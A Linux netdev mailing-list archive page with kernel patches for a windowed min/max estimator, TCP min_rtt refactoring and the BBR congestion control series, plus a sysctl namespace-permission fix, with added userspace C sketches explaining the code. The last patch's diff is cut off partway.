Netdev List
* [PATCH v3 net-next 02/16] lib/win_minmax: windowed min or max estimator
From: Neal Cardwell @ 2016-09-18 22:03 UTC
  To: David Miller
  Cc: netdev, Neal Cardwell, Van Jacobson, Yuchung Cheng,
	Nandita Dukkipati, Eric Dumazet, Soheil Hassas Yeganeh
In-Reply-To: <1474236233-28511-1-git-send-email-ncardwell@google.com>

This commit introduces a generic library to estimate either the min or
max value of a time-varying variable over a recent time window. This
is code originally from Kathleen Nichols. The current form of the code
is from Van Jacobson.

A single struct minmax_sample will track the estimated windowed-max
value of the series if you call minmax_running_max() or the estimated
windowed-min value of the series if you call minmax_running_min().

Nearly equivalent code is already in place for minimum RTT estimation
in the TCP stack. This commit extracts that code and generalizes it to
handle both min and max. Moving the code here reduces the footprint
and complexity of the TCP code base and makes the filter generally
available for other parts of the codebase, including an upcoming TCP
congestion control module.

This library works well for time series where the measurements are
smoothly increasing or decreasing.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
---
 include/linux/win_minmax.h | 37 +++++++++++++++++
 lib/Makefile               |  2 +-
 lib/win_minmax.c           | 98 ++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 136 insertions(+), 1 deletion(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c

diff --git a/include/linux/win_minmax.h b/include/linux/win_minmax.h
new file mode 100644
index 0000000..5656960
--- /dev/null
+++ b/include/linux/win_minmax.h
@@ -0,0 +1,37 @@
+/**
+ * include/linux/win_minmax.h: windowed min/max tracker by Kathleen Nichols.
+ *
+ */
+#ifndef MINMAX_H
+#define MINMAX_H
+
+#include <linux/types.h>
+
+/* A single data point for our parameterized min-max tracker */
+struct minmax_sample {
+	u32	t;	/* time measurement was taken */
+	u32	v;	/* value measured */
+};
+
+/* State for the parameterized min-max tracker */
+struct minmax {
+	struct minmax_sample s[3];
+};
+
+static inline u32 minmax_get(const struct minmax *m)
+{
+	return m->s[0].v;
+}
+
+static inline u32 minmax_reset(struct minmax *m, u32 t, u32 meas)
+{
+	struct minmax_sample val = { .t = t, .v = meas };
+
+	m->s[2] = m->s[1] = m->s[0] = val;
+	return m->s[0].v;
+}
+
+u32 minmax_running_max(struct minmax *m, u32 win, u32 t, u32 meas);
+u32 minmax_running_min(struct minmax *m, u32 win, u32 t, u32 meas);
+
+#endif
diff --git a/lib/Makefile b/lib/Makefile
index 5dc77a8..df747e5 100644
--- a/lib/Makefile
+++ b/lib/Makefile
@@ -22,7 +22,7 @@ lib-y := ctype.o string.o vsprintf.o cmdline.o \
 	 sha1.o chacha20.o md5.o irq_regs.o argv_split.o \
 	 flex_proportions.o ratelimit.o show_mem.o \
 	 is_single_threaded.o plist.o decompress.o kobject_uevent.o \
-	 earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o
+	 earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o win_minmax.o
 
 lib-$(CONFIG_MMU) += ioremap.o
 lib-$(CONFIG_SMP) += cpumask.o
diff --git a/lib/win_minmax.c b/lib/win_minmax.c
new file mode 100644
index 0000000..c8420d4
--- /dev/null
+++ b/lib/win_minmax.c
@@ -0,0 +1,98 @@
+/**
+ * lib/win_minmax.c: windowed min/max tracker
+ *
+ * Kathleen Nichols' algorithm for tracking the minimum (or maximum)
+ * value of a data stream over some fixed time interval.  (E.g.,
+ * the minimum RTT over the past five minutes.) It uses constant
+ * space and constant time per update yet almost always delivers
+ * the same minimum as an implementation that has to keep all the
+ * data in the window.
+ *
+ * The algorithm keeps track of the best, 2nd best & 3rd best min
+ * values, maintaining an invariant that the measurement time of
+ * the n'th best >= n-1'th best. It also makes sure that the three
+ * values are widely separated in the time window since that bounds
+ * the worst-case error when the data is monotonically increasing
+ * over the window.
+ *
+ * Upon getting a new min, we can forget everything earlier because
+ * it has no value - the new min is <= everything else in the window
+ * by definition and it's the most recent. So we restart fresh on
+ * every new min and overwrite 2nd & 3rd choices. The same property
+ * holds for 2nd & 3rd best.
+ */
+#include <linux/module.h>
+#include <linux/win_minmax.h>
+
+/* As time advances, update the 1st, 2nd, and 3rd choices. */
+static u32 minmax_subwin_update(struct minmax *m, u32 win,
+				const struct minmax_sample *val)
+{
+	u32 dt = val->t - m->s[0].t;
+
+	if (unlikely(dt > win)) {
+		/*
+		 * Passed entire window without a new val so make 2nd
+		 * choice the new val & 3rd choice the new 2nd choice.
+		 * we may have to iterate this since our 2nd choice
+		 * may also be outside the window (we checked on entry
+		 * that the third choice was in the window).
+		 */
+		m->s[0] = m->s[1];
+		m->s[1] = m->s[2];
+		m->s[2] = *val;
+		if (unlikely(val->t - m->s[0].t > win)) {
+			m->s[0] = m->s[1];
+			m->s[1] = m->s[2];
+			m->s[2] = *val;
+		}
+	} else if (unlikely(m->s[1].t == m->s[0].t) && dt > win/4) {
+		/*
+		 * We've passed a quarter of the window without a new val
+		 * so take a 2nd choice from the 2nd quarter of the window.
+		 */
+		m->s[2] = m->s[1] = *val;
+	} else if (unlikely(m->s[2].t == m->s[1].t) && dt > win/2) {
+		/*
+		 * We've passed half the window without finding a new val
+		 * so take a 3rd choice from the last half of the window
+		 */
+		m->s[2] = *val;
+	}
+	return m->s[0].v;
+}
+
+/* Check if new measurement updates the 1st, 2nd or 3rd choice max. */
+u32 minmax_running_max(struct minmax *m, u32 win, u32 t, u32 meas)
+{
+	struct minmax_sample val = { .t = t, .v = meas };
+
+	if (unlikely(val.v >= m->s[0].v) ||	  /* found new max? */
+	    unlikely(val.t - m->s[2].t > win))	  /* nothing left in window? */
+		return minmax_reset(m, t, meas);  /* forget earlier samples */
+
+	if (unlikely(val.v >= m->s[1].v))
+		m->s[2] = m->s[1] = val;
+	else if (unlikely(val.v >= m->s[2].v))
+		m->s[2] = val;
+
+	return minmax_subwin_update(m, win, &val);
+}
+EXPORT_SYMBOL(minmax_running_max);
+
+/* Check if new measurement updates the 1st, 2nd or 3rd choice min. */
+u32 minmax_running_min(struct minmax *m, u32 win, u32 t, u32 meas)
+{
+	struct minmax_sample val = { .t = t, .v = meas };
+
+	if (unlikely(val.v <= m->s[0].v) ||	  /* found new min? */
+	    unlikely(val.t - m->s[2].t > win))	  /* nothing left in window? */
+		return minmax_reset(m, t, meas);  /* forget earlier samples */
+
+	if (unlikely(val.v <= m->s[1].v))
+		m->s[2] = m->s[1] = val;
+	else if (unlikely(val.v <= m->s[2].v))
+		m->s[2] = val;
+
+	return minmax_subwin_update(m, win, &val);
+}
-- 
2.8.0.rc3.226.g39d4020
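
For readers who want to try the estimator outside the kernel, here is a
minimal userspace sketch of the windowed-max path from the patch above.
It assumes plain <stdint.h> types in place of u32 and drops the
unlikely() hints; the names wsample, wfilter, wfilter_* and
windowed_max_demo are hypothetical and not part of the patch.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical userspace mirror of struct minmax_sample / struct minmax. */
struct wsample { uint32_t t, v; };
struct wfilter { struct wsample s[3]; };

/* Forget all history: all three choices become the new sample. */
uint32_t wfilter_reset(struct wfilter *m, uint32_t t, uint32_t meas)
{
	struct wsample val = { .t = t, .v = meas };

	m->s[2] = m->s[1] = m->s[0] = val;
	return m->s[0].v;
}

/* As time advances, age out or refresh the 1st, 2nd and 3rd choices. */
uint32_t wfilter_subwin_update(struct wfilter *m, uint32_t win,
			       const struct wsample *val)
{
	uint32_t dt = val->t - m->s[0].t;

	if (dt > win) {
		/* Best choice left the window: promote the others. */
		m->s[0] = m->s[1];
		m->s[1] = m->s[2];
		m->s[2] = *val;
		if (val->t - m->s[0].t > win) {
			m->s[0] = m->s[1];
			m->s[1] = m->s[2];
			m->s[2] = *val;
		}
	} else if (m->s[1].t == m->s[0].t && dt > win / 4) {
		/* A quarter window passed: take a 2nd choice. */
		m->s[2] = m->s[1] = *val;
	} else if (m->s[2].t == m->s[1].t && dt > win / 2) {
		/* Half a window passed: take a 3rd choice. */
		m->s[2] = *val;
	}
	return m->s[0].v;
}

/* Feed one measurement; returns the current windowed-max estimate. */
uint32_t wfilter_running_max(struct wfilter *m, uint32_t win,
			     uint32_t t, uint32_t meas)
{
	struct wsample val = { .t = t, .v = meas };

	if (val.v >= m->s[0].v ||		/* found new max? */
	    val.t - m->s[2].t > win)		/* nothing left in window? */
		return wfilter_reset(m, t, meas);

	if (val.v >= m->s[1].v)
		m->s[2] = m->s[1] = val;
	else if (val.v >= m->s[2].v)
		m->s[2] = val;

	return wfilter_subwin_update(m, win, &val);
}

/* Decreasing series with a window of 10 ticks. */
uint32_t windowed_max_demo(void)
{
	struct wfilter f;
	const uint32_t win = 10;
	uint32_t r;

	wfilter_reset(&f, 0, 0);
	r = wfilter_running_max(&f, win, 1, 100);	/* new max */
	assert(r == 100);
	r = wfilter_running_max(&f, win, 2, 50);
	assert(r == 100);
	r = wfilter_running_max(&f, win, 5, 40);	/* becomes 2nd choice */
	assert(r == 100);
	r = wfilter_running_max(&f, win, 8, 30);	/* becomes 3rd choice */
	assert(r == 100);
	/* At t=12 the sample from t=1 is older than the window. */
	return wfilter_running_max(&f, win, 12, 20);
}
```

Calling windowed_max_demo() from a test program returns 40: once the
peak of 100 ages out, the filter falls back to the 2nd choice it picked
up at t=5 rather than to the newest sample.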


* [PATCH v3 net-next 03/16] tcp: use windowed min filter library for TCP min_rtt estimation
From: Neal Cardwell @ 2016-09-18 22:03 UTC
  To: David Miller
  Cc: netdev, Neal Cardwell, Van Jacobson, Yuchung Cheng,
	Nandita Dukkipati, Eric Dumazet, Soheil Hassas Yeganeh
In-Reply-To: <1474236233-28511-1-git-send-email-ncardwell@google.com>

Refactor the TCP min_rtt code to reuse the new win_minmax library in
lib/win_minmax.c to simplify the TCP code.

This is a pure refactor: the functionality is exactly the same. We
just moved the windowed min code to make TCP easier to read and
maintain, and to allow other parts of the kernel to use the windowed
min/max filter code.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
---
 include/linux/tcp.h      |  5 ++--
 include/net/tcp.h        |  2 +-
 net/ipv4/tcp.c           |  2 +-
 net/ipv4/tcp_input.c     | 64 ++++--------------------------------------------
 net/ipv4/tcp_minisocks.c |  2 +-
 5 files changed, 10 insertions(+), 65 deletions(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index c723a46..6433cc8 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -19,6 +19,7 @@
 
 
 #include <linux/skbuff.h>
+#include <linux/win_minmax.h>
 #include <net/sock.h>
 #include <net/inet_connection_sock.h>
 #include <net/inet_timewait_sock.h>
@@ -234,9 +235,7 @@ struct tcp_sock {
 	u32	mdev_max_us;	/* maximal mdev for the last rtt period	*/
 	u32	rttvar_us;	/* smoothed mdev_max			*/
 	u32	rtt_seq;	/* sequence number to update rttvar	*/
-	struct rtt_meas {
-		u32 rtt, ts;	/* RTT in usec and sampling time in jiffies. */
-	} rtt_min[3];
+	struct  minmax rtt_min;
 
 	u32	packets_out;	/* Packets which are "in flight"	*/
 	u32	retrans_out;	/* Retransmitted packets out		*/
diff --git a/include/net/tcp.h b/include/net/tcp.h
index fdfbedd..2f1648a 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -671,7 +671,7 @@ static inline bool tcp_ca_dst_locked(const struct dst_entry *dst)
 /* Minimum RTT in usec. ~0 means not available. */
 static inline u32 tcp_min_rtt(const struct tcp_sock *tp)
 {
-	return tp->rtt_min[0].rtt;
+	return minmax_get(&tp->rtt_min);
 }
 
 /* Compute the actual receive window we are currently advertising.
diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
index a13fcb3..5b0b49c 100644
--- a/net/ipv4/tcp.c
+++ b/net/ipv4/tcp.c
@@ -387,7 +387,7 @@ void tcp_init_sock(struct sock *sk)
 
 	icsk->icsk_rto = TCP_TIMEOUT_INIT;
 	tp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
-	tp->rtt_min[0].rtt = ~0U;
+	minmax_reset(&tp->rtt_min, tcp_time_stamp, ~0U);
 
 	/* So many TCP implementations out there (incorrectly) count the
 	 * initial SYN frame in their delayed-ACK and congestion control
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index 70b892d..ac5b38f 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -2879,67 +2879,13 @@ static void tcp_fastretrans_alert(struct sock *sk, const int acked,
 	*rexmit = REXMIT_LOST;
 }
 
-/* Kathleen Nichols' algorithm for tracking the minimum value of
- * a data stream over some fixed time interval. (E.g., the minimum
- * RTT over the past five minutes.) It uses constant space and constant
- * time per update yet almost always delivers the same minimum as an
- * implementation that has to keep all the data in the window.
- *
- * The algorithm keeps track of the best, 2nd best & 3rd best min
- * values, maintaining an invariant that the measurement time of the
- * n'th best >= n-1'th best. It also makes sure that the three values
- * are widely separated in the time window since that bounds the worse
- * case error when that data is monotonically increasing over the window.
- *
- * Upon getting a new min, we can forget everything earlier because it
- * has no value - the new min is <= everything else in the window by
- * definition and it's the most recent. So we restart fresh on every new min
- * and overwrites 2nd & 3rd choices. The same property holds for 2nd & 3rd
- * best.
- */
 static void tcp_update_rtt_min(struct sock *sk, u32 rtt_us)
 {
-	const u32 now = tcp_time_stamp, wlen = sysctl_tcp_min_rtt_wlen * HZ;
-	struct rtt_meas *m = tcp_sk(sk)->rtt_min;
-	struct rtt_meas rttm = {
-		.rtt = likely(rtt_us) ? rtt_us : jiffies_to_usecs(1),
-		.ts = now,
-	};
-	u32 elapsed;
-
-	/* Check if the new measurement updates the 1st, 2nd, or 3rd choices */
-	if (unlikely(rttm.rtt <= m[0].rtt))
-		m[0] = m[1] = m[2] = rttm;
-	else if (rttm.rtt <= m[1].rtt)
-		m[1] = m[2] = rttm;
-	else if (rttm.rtt <= m[2].rtt)
-		m[2] = rttm;
-
-	elapsed = now - m[0].ts;
-	if (unlikely(elapsed > wlen)) {
-		/* Passed entire window without a new min so make 2nd choice
-		 * the new min & 3rd choice the new 2nd. So forth and so on.
-		 */
-		m[0] = m[1];
-		m[1] = m[2];
-		m[2] = rttm;
-		if (now - m[0].ts > wlen) {
-			m[0] = m[1];
-			m[1] = rttm;
-			if (now - m[0].ts > wlen)
-				m[0] = rttm;
-		}
-	} else if (m[1].ts == m[0].ts && elapsed > wlen / 4) {
-		/* Passed a quarter of the window without a new min so
-		 * take 2nd choice from the 2nd quarter of the window.
-		 */
-		m[2] = m[1] = rttm;
-	} else if (m[2].ts == m[1].ts && elapsed > wlen / 2) {
-		/* Passed half the window without a new min so take the 3rd
-		 * choice from the last half of the window.
-		 */
-		m[2] = rttm;
-	}
+	struct tcp_sock *tp = tcp_sk(sk);
+	u32 wlen = sysctl_tcp_min_rtt_wlen * HZ;
+
+	minmax_running_min(&tp->rtt_min, wlen, tcp_time_stamp,
+			   rtt_us ? : jiffies_to_usecs(1));
 }
 
 static inline bool tcp_ack_update_rtt(struct sock *sk, const int flag,
diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
index f63c73d..5689471 100644
--- a/net/ipv4/tcp_minisocks.c
+++ b/net/ipv4/tcp_minisocks.c
@@ -464,7 +464,7 @@ struct sock *tcp_create_openreq_child(const struct sock *sk,
 
 		newtp->srtt_us = 0;
 		newtp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
-		newtp->rtt_min[0].rtt = ~0U;
+		minmax_reset(&newtp->rtt_min, tcp_time_stamp, ~0U);
 		newicsk->icsk_rto = TCP_TIMEOUT_INIT;
 
 		newtp->packets_out = 0;
-- 
2.8.0.rc3.226.g39d4020


* [PATCH v3 net-next 01/16] tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
From: Neal Cardwell @ 2016-09-18 22:03 UTC
  To: David Miller
  Cc: netdev, Soheil Hassas Yeganeh, Neal Cardwell, Yuchung Cheng,
	Eric Dumazet, Kenneth Klette Jonassen
In-Reply-To: <1474236233-28511-1-git-send-email-ncardwell@google.com>

From: Soheil Hassas Yeganeh <soheil@google.com>

The upcoming change "lib/win_minmax: windowed min or max estimator"
introduces a struct called minmax, which is then included in
include/linux/tcp.h in the upcoming change "tcp: use windowed min
filter library for TCP min_rtt estimation". This would create a
compilation error for tcp_cdg.c, which defines its own minmax
struct. To avoid this naming conflict (and potentially others in the
future), this commit renames the version used in tcp_cdg.c to
cdg_minmax.

Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Kenneth Klette Jonassen <kennetkl@ifi.uio.no>
---
 net/ipv4/tcp_cdg.c | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/ipv4/tcp_cdg.c b/net/ipv4/tcp_cdg.c
index 03725b2..35b2803 100644
--- a/net/ipv4/tcp_cdg.c
+++ b/net/ipv4/tcp_cdg.c
@@ -56,7 +56,7 @@ MODULE_PARM_DESC(use_shadow, "use shadow window heuristic");
 module_param(use_tolerance, bool, 0644);
 MODULE_PARM_DESC(use_tolerance, "use loss tolerance heuristic");
 
-struct minmax {
+struct cdg_minmax {
 	union {
 		struct {
 			s32 min;
@@ -74,10 +74,10 @@ enum cdg_state {
 };
 
 struct cdg {
-	struct minmax rtt;
-	struct minmax rtt_prev;
-	struct minmax *gradients;
-	struct minmax gsum;
+	struct cdg_minmax rtt;
+	struct cdg_minmax rtt_prev;
+	struct cdg_minmax *gradients;
+	struct cdg_minmax gsum;
 	bool gfilled;
 	u8  tail;
 	u8  state;
@@ -353,7 +353,7 @@ static void tcp_cdg_cwnd_event(struct sock *sk, const enum tcp_ca_event ev)
 {
 	struct cdg *ca = inet_csk_ca(sk);
 	struct tcp_sock *tp = tcp_sk(sk);
-	struct minmax *gradients;
+	struct cdg_minmax *gradients;
 
 	switch (ev) {
 	case CA_EVENT_CWND_RESTART:
-- 
2.8.0.rc3.226.g39d4020


* [PATCH v3 net-next 00/16] tcp: BBR congestion control algorithm
From: Neal Cardwell @ 2016-09-18 22:03 UTC
  To: David Miller; +Cc: netdev, Neal Cardwell

tcp: BBR congestion control algorithm

This patch series implements a new TCP congestion control algorithm:
BBR (Bottleneck Bandwidth and RTT). A paper with a detailed
description of BBR will be published in ACM Queue, September-October
2016, as "BBR: Congestion-Based Congestion Control". BBR is widely
deployed in production at Google.

The patch series starts with a set of supporting infrastructure
changes, including a few that extend the congestion control
framework. The last patch adds BBR as a TCP congestion control
module. Please see individual patches for the details.

- v2 -> v3: fix another issue caught by build bots:
 - adjust rate_sample struct initialization syntax to allow gcc-4.4 to compile
   the "tcp: track data delivery rate for a TCP connection" patch; also
   adjusted some similar syntax in "tcp_bbr: add BBR congestion control"

- v1 -> v2: fix issues caught by build bots:
 - fix "tcp: export data delivery rate" to use rate64 instead of rate,
   so there is a 64-bit numerator for the do_div call
 - fix conflicting definitions for minmax caused by
   "tcp: use windowed min filter library for TCP min_rtt estimation"
   with a new commit:
   tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
 - fix warning about the use of __packed in
   "tcp: track data delivery rate for a TCP connection",
   which involves the addition of a new commit:
   tcp: switch back to proper tcp_skb_cb size check in tcp_init()  
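
As background for the rate64 item above: the kernel's do_div() divides
a 64-bit lvalue in place by a 32-bit divisor and returns the remainder,
so the numerator has to be a 64-bit variable. The userspace sketch
below only models that behaviour. model_do_div(), bytes_per_sec() and
rate_demo() are hypothetical names, and the arithmetic is an assumed
example, not the code in "tcp: export data delivery rate".

```c
#include <assert.h>
#include <stdint.h>

/* Userspace stand-in for do_div(): divide *n in place, return remainder. */
uint32_t model_do_div(uint64_t *n, uint32_t base)
{
	uint32_t rem = (uint32_t)(*n % base);

	*n /= base;
	return rem;
}

/* Scale a byte count over an interval in usec to bytes per second. */
uint64_t bytes_per_sec(uint32_t bytes, uint32_t interval_us)
{
	/* Widen before multiplying: bytes * 1000000 can exceed 32 bits. */
	uint64_t rate64 = (uint64_t)bytes * 1000000u;

	model_do_div(&rate64, interval_us);
	return rate64;
}

uint64_t rate_demo(void)
{
	/* 5000 bytes in 1000 usec: the intermediate 5e9 needs 64 bits. */
	uint64_t rate = bytes_per_sec(5000, 1000);

	assert(rate == 5000000u);
	return rate;
}
```

With a 32-bit numerator the intermediate product in rate_demo() would
wrap, which is the kind of problem a 64-bit rate64 variable avoids.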

Eric Dumazet (2):
  net_sched: sch_fq: add low_rate_threshold parameter
  tcp: switch back to proper tcp_skb_cb size check in tcp_init()

Neal Cardwell (8):
  lib/win_minmax: windowed min or max estimator
  tcp: use windowed min filter library for TCP min_rtt estimation
  tcp: count packets marked lost for a TCP connection
  tcp: allow congestion control module to request TSO skb segment count
  tcp: export tcp_tso_autosize() and parameterize minimum number of TSO
    segments
  tcp: export tcp_mss_to_mtu() for congestion control modules
  tcp: increase ICSK_CA_PRIV_SIZE from 64 bytes to 88
  tcp_bbr: add BBR congestion control

Soheil Hassas Yeganeh (2):
  tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
  tcp: track application-limited rate samples

Yuchung Cheng (4):
  tcp: track data delivery rate for a TCP connection
  tcp: export data delivery rate
  tcp: allow congestion control to expand send buffer differently
  tcp: new CC hook to set sending rate with rate_sample in any CA state

 include/linux/tcp.h                |  14 +-
 include/linux/win_minmax.h         |  37 ++
 include/net/inet_connection_sock.h |   4 +-
 include/net/tcp.h                  |  53 ++-
 include/uapi/linux/inet_diag.h     |  13 +
 include/uapi/linux/pkt_sched.h     |   2 +
 include/uapi/linux/tcp.h           |   3 +
 lib/Makefile                       |   2 +-
 lib/win_minmax.c                   |  98 +++++
 net/ipv4/Kconfig                   |  18 +
 net/ipv4/Makefile                  |   3 +-
 net/ipv4/tcp.c                     |  26 +-
 net/ipv4/tcp_bbr.c                 | 875 +++++++++++++++++++++++++++++++++++++
 net/ipv4/tcp_cdg.c                 |  12 +-
 net/ipv4/tcp_cong.c                |   2 +-
 net/ipv4/tcp_input.c               | 154 +++----
 net/ipv4/tcp_minisocks.c           |   5 +-
 net/ipv4/tcp_output.c              |  27 +-
 net/ipv4/tcp_rate.c                | 186 ++++++++
 net/sched/sch_fq.c                 |  22 +-
 20 files changed, 1449 insertions(+), 107 deletions(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c
 create mode 100644 net/ipv4/tcp_bbr.c
 create mode 100644 net/ipv4/tcp_rate.c

-- 
2.8.0.rc3.226.g39d4020


* [PATCH] net: explicitly whitelist sysctls for unpriv namespaces
From: Jann Horn @ 2016-09-18 20:58 UTC
  To: David S. Miller, Alexey Kuznetsov, James Morris,
	Hideaki YOSHIFUJI, Patrick McHardy
  Cc: netdev

There were two net sysctls that could be written from unprivileged net
namespaces, but weren't actually namespaced.

To fix the existing issues and prevent this kind of thing from happening
again in the future, explicitly whitelist permitted sysctls.

Note: The current whitelist is "allow everything that was previously
accessible and that doesn't obviously modify global state".

On my system, this patch just removes the write permissions for
ipv4/netfilter/ip_conntrack_max, which would have been usable for a local
DoS. With a different config, the ipv4/vs/debug_level sysctl would also be
affected.

Maximum impact of this seems to be local DoS, and it's a fairly large
commit, so I'm sending this publicly directly.

An alternative (and much smaller) fix would be to just change the
permissions of the two files in question to be 0444 in non-privileged
namespaces, but I believe that this solution is slightly less error-prone.
If you think I should switch to the simple fix, let me know.

Signed-off-by: Jann Horn <jann@thejh.net>
---
 include/linux/sysctl.h                         |  1 +
 net/ax25/sysctl_net_ax25.c                     |  4 +++-
 net/ieee802154/6lowpan/reassembly.c            |  7 +++++--
 net/ipv4/devinet.c                             |  2 ++
 net/ipv4/ip_fragment.c                         | 10 ++++++---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c |  3 +++
 net/ipv4/netfilter/nf_conntrack_proto_icmp.c   |  2 ++
 net/ipv4/sysctl_net_ipv4.c                     |  4 +++-
 net/ipv4/xfrm4_policy.c                        |  1 +
 net/ipv6/addrconf.c                            |  1 +
 net/ipv6/icmp.c                                |  1 +
 net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c |  1 +
 net/ipv6/netfilter/nf_conntrack_reasm.c        |  7 +++++--
 net/ipv6/sysctl_net_ipv6.c                     | 23 ++++++++++++++-------
 net/ipv6/xfrm6_policy.c                        |  1 +
 net/mpls/af_mpls.c                             |  2 ++
 net/netfilter/ipvs/ip_vs_ctl.c                 | 26 ++++++++++++++++++++++++
 net/netfilter/nf_conntrack_proto_generic.c     |  2 ++
 net/netfilter/nf_conntrack_proto_sctp.c        | 16 +++++++++++++++
 net/netfilter/nf_conntrack_proto_tcp.c         | 26 ++++++++++++++++++++++++
 net/netfilter/nf_conntrack_proto_udp.c         |  4 ++++
 net/netfilter/nf_conntrack_proto_udplite.c     |  2 ++
 net/netfilter/nf_log.c                         |  1 +
 net/rds/tcp.c                                  |  2 ++
 net/sctp/sysctl.c                              |  4 +++-
 net/sysctl_net.c                               | 28 +++++++++++++++++---------
 26 files changed, 154 insertions(+), 27 deletions(-)
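
The whitelist idea can be modelled in a few lines of userspace C. This
is only a sketch of the policy described in the commit message, under
the assumption that a non-whitelisted entry simply loses its write bits
in an unprivileged namespace. struct ctl_entry, effective_mode() and
whitelist_demo() are hypothetical, and the real check in
net/sysctl_net.c may be structured differently.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical, trimmed-down stand-in for struct ctl_table. */
struct ctl_entry {
	const char *procname;
	unsigned int mode;	/* permission bits, e.g. 0644 */
	bool namespaced;	/* allow writes in unpriv netns? */
};

/* Mode a caller sees, given whether it is in an unprivileged netns. */
unsigned int effective_mode(const struct ctl_entry *e, bool unpriv_netns)
{
	if (unpriv_netns && !e->namespaced)
		return e->mode & ~0222u;	/* strip all write bits */
	return e->mode;
}

int whitelist_demo(void)
{
	/* Not whitelisted: per the commit message it loses write access. */
	struct ctl_entry max = { "ip_conntrack_max", 0644, false };
	/* Whitelisted in the diff below via .namespaced = true. */
	struct ctl_entry frag = { "ipfrag_time", 0644, true };

	assert(effective_mode(&max, true) == 0444);
	assert(effective_mode(&max, false) == 0644);
	assert(effective_mode(&frag, true) == 0644);
	return 0;
}
```

Because the flag defaults to false, a newly added sysctl that nobody
marks stays read-only in unprivileged namespaces, which is the
"less error-prone" property argued for above.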

diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
index a4f7203..c47c52d 100644
--- a/include/linux/sysctl.h
+++ b/include/linux/sysctl.h
@@ -116,6 +116,7 @@ struct ctl_table
 	struct ctl_table_poll *poll;
 	void *extra1;
 	void *extra2;
+	bool namespaced;		/* allow writes in unpriv netns? */
 };
 
 struct ctl_node {
diff --git a/net/ax25/sysctl_net_ax25.c b/net/ax25/sysctl_net_ax25.c
index 919a5ce..8e6ab36 100644
--- a/net/ax25/sysctl_net_ax25.c
+++ b/net/ax25/sysctl_net_ax25.c
@@ -158,8 +158,10 @@ int ax25_register_dev_sysctl(ax25_dev *ax25_dev)
 	if (!table)
 		return -ENOMEM;
 
-	for (k = 0; k < AX25_MAX_VALUES; k++)
+	for (k = 0; k < AX25_MAX_VALUES; k++) {
 		table[k].data = &ax25_dev->values[k];
+		table[k].namespaced = true;
+	}
 
 	snprintf(path, sizeof(path), "net/ax25/%s", ax25_dev->dev->name);
 	ax25_dev->sysheader = register_net_sysctl(&init_net, path, table);
diff --git a/net/ieee802154/6lowpan/reassembly.c b/net/ieee802154/6lowpan/reassembly.c
index 30d875d..8a1d5b7 100644
--- a/net/ieee802154/6lowpan/reassembly.c
+++ b/net/ieee802154/6lowpan/reassembly.c
@@ -456,7 +456,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &init_net.ieee802154_lowpan.frags.low_thresh
+		.extra1		= &init_net.ieee802154_lowpan.frags.low_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "6lowpanfrag_low_thresh",
@@ -465,7 +466,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
-		.extra2		= &init_net.ieee802154_lowpan.frags.high_thresh
+		.extra2		= &init_net.ieee802154_lowpan.frags.high_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "6lowpanfrag_time",
@@ -473,6 +475,7 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
index 062a67c..8bbed18 100644
--- a/net/ipv4/devinet.c
+++ b/net/ipv4/devinet.c
@@ -2166,6 +2166,7 @@ static int ipv4_doint_and_flush(struct ctl_table *ctl, int write,
 		.mode		= mval, \
 		.proc_handler	= proc, \
 		.extra1		= &ipv4_devconf, \
+		.namespaced	= true, \
 	}
 
 #define DEVINET_SYSCTL_RW_ENTRY(attr, name) \
@@ -2310,6 +2311,7 @@ static struct ctl_table ctl_forward_entry[] = {
 		.proc_handler	= devinet_sysctl_forward,
